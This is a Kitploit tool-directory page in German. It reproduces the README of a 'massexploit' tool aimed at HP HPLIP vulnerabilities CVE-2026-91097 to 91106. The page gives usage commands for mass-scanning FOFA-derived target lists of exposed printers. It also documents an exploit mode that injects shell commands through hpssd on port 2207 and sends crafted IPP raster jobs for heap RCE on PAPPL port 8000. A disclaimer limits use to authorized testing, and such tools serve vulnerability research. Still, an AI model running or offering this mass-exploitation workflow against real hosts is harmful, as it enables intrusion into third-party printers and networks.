Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
HP-HPLIP-Mass-CVE-checker-2026-09- — Massenprüfung/-recherche-Exploit für HP HPLIP CVE-2026-91097–91106 (<3.26.6), PAPPL :8000 IPP-Sonden + hpssd-Vorlagen | Kitploit
Tools/GitHubGitHub/murrez/hp-hplip-mass-cve-checker-2026-09-
AufklärungSchwachstellenscannerIoT-SicherheitExploitationInformationsbeschaffungNetzwerksicherheitPenetrationstestsDienstprogramme & Frameworks

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
murrez/hp-hplip-mass-cve-checker-2026-09-

HP-HPLIP-Mass-CVE-checker-2026-09-

Massenprüfung/-recherche-Exploit für HP HPLIP CVE-2026-91097–91106 (<3.26.6), PAPPL :8000 IPP-Sonden + hpssd-Vorlagen

Repository anzeigen
vor 3h 25mNoch nicht geprüft
Teilen

massexploit — HP HPLIP Massen-CVE-Checker (2026-09)

Massen-Check- und Research-Exploit-Treiber für HP HPLIP < 3.26.6 — CVE-2026-91097 bis CVE-2026-91106.

CVECVSS 4CWERemote
CVE-2026-910977.0CWE-787ja (UI)
CVE-2026-910988.6CWE-122ja (UI)
CVE-2026-910995.1CWE-61lokal
CVE-2026-911006.8CWE-78lokal
CVE-2026-911028.4CWE-78lokal
CVE-2026-911015.1CWE-129physisch
CVE-2026-911035.1CWE-191physisch
CVE-2026-911049.3CWE-122ja
CVE-2026-911058.6CWE-122ja (UI)
CVE-2026-911069.3CWE-122ja

Behoben: HPLIP 3.26.6+

Zusammenfassung

FOFA body="hplip"-Treffer sind oft :8000 PAPPL, nicht :2207. Verwende host:port in Ziellisten.

Screenshot (--flow Massen-Check)

massexploit flow output

Anforderungen

  • Python 3.9+
  • pip install -r requirements.txt

Verwendung

root@kitploit:~
pip install -r requirements.txt

# Single target (default ports 631, 2207, 9100 if no port given)
python poc.py -u 192.0.2.10 --mode check

# FOFA port (recommended)
python poc.py -u 192.0.2.10:8000 --mode check --flow

# Mass — all 10 CVEs
python poc.py --list targets.example.txt --mode check -j 30 -q --flow

# Critical network heap CVEs only
python poc.py --list list_hplip_printer.txt --mode check --cve CVE-2026-91104,CVE-2026-91106

# Exploit research (PAPPL on :8000 → IPP raster; -c id only meaningful on hpssd:2207)
python poc.py -u 192.0.2.10:8000 --mode exploit --cve CVE-2026-91106
python poc.py -u 192.0.2.10:2207 --mode exploit --cve CVE-2026-91100 -c id

FOFA → Zielliste

root@kitploit:~
# Save export as fofa_csv_1049.csv (or pass -i)
python fofa_to_list.py
# list.txt (all) + list_hplip_printer.txt (title hint = HPLIP Printer Application)
python poc.py --list list_hplip_printer.txt --mode check -j 30 --flow

Format der Zielliste

root@kitploit:~
192.0.2.10:8000
192.0.2.11:2207
192.0.2.12|CVE-2026-91106

Zeilen mit |CVE… verwenden den Teil vor | als Host (optionaler CVE-Hinweis für die Trefferausgabe).

CLI

Ausgabe

DateiInhalt
massexploit_results.jsonlVollständiges JSON pro Host
hits.txtKandidaten (host|cve,…)

Häufige status-Werte beim Check

StatusBedeutung
hplip_surface_candidateOffener Port + Versions-/CVE-Zuordnung

Exploit-Erwartungen

StatusBedeutung
pappl_raster_sent_no_shell_outputIPP/Raster auf PAPPL-Port gesendet; kein id in HTTP (Heap-RCE-Klasse)

Repository-Struktur

root@kitploit:~
.
├── poc.py
├── cve_catalog.py
├── hplip_probes.py
├── hplip_exploit.py
├── pappl_ipp.py
├── pappl_raster.py
├── fofa_to_list.py
├── image.png             
├── targets.example.txt
├── requirements.txt
├── README.md
├── LICENSE
└── .gitignore

Einschränkungen

  • Kein generischer Web-Scanner — Drucker-/HPLIP-TCP+HTTP-Oberflächen.
  • Kein öffentlich weaponisiertes RCE für 91104/91106 auf PAPPL; der Raster-Pfad ist Research in Anlehnung an ZDI-26-656.
  • Physische/lokale CVEs sind für --cve all aufgeführt, aber nicht im großen Stil remote ausnutzbar.
  • Nur autorisiertes Testen.

Referenzen

  • HP HPSBPI04151
  • ZDI-26-656 (PAPPL raster)
  • GHSA-p9wg-4p56-7xp6

Rechtliches

Nur für autorisiertes Sicherheitstesten. Du bist für die Einhaltung der geltenden Gesetze und Programmregeln verantwortlich.

Tool herunterladen
OberflächeErkennungExploit-Hinweise
hpssd :2207TCP + XML-Probe-c id Command-Injection-Template (Legacy-hpssd-Stil)
CUPS/IPP :631HTTP-ProbeKatalog / Fingerprint
HPLIP Printer Application :8000+HTTP-PAPPL-UI + VersionsstringIPP Print-Job + PWG-Raster-Research (ZDI-26-656 / PAPPL < 1.4.12) — nicht Shell-Ausgabe über HTTP
OptionBeschreibung
-u / --urlHost, host:port oder http://host:port
--listEin Ziel pro Zeile
--modecheck oder exploit
--cveall oder kommagetrennte CVE-IDs
-c / --commandShell-Befehl (nur hpssd-Command-Injection-Versuche)
--heap-sizeGröße der rohen TCP-Heap-Probe (Standard 8192)
--threads, -jMassen-Parallelität (Standard 20)
--timeoutTimeout pro Ziel in Sekunden (Standard 8)
--flow, -fEine Ergebniszeile pro Ziel
--outputJSONL (Standard massexploit_results.jsonl)
--vuln-listhits.txt (Check) oder exploited.txt (Exploit)
network_surface_version_unknown
TCP offen, HPLIP/PAPPL wahrscheinlich, Version nicht lesbar
no_open_portsNichts auf den gescannten Ports erreichbar
patched_versionHPLIP-Version ≥ 3.26.6
exploit_attempted_no_confirmVersuch unternommen, keine Verifikation
exploitedNur wenn die Antwort den Command-Injection-Heuristiken entspricht (selten)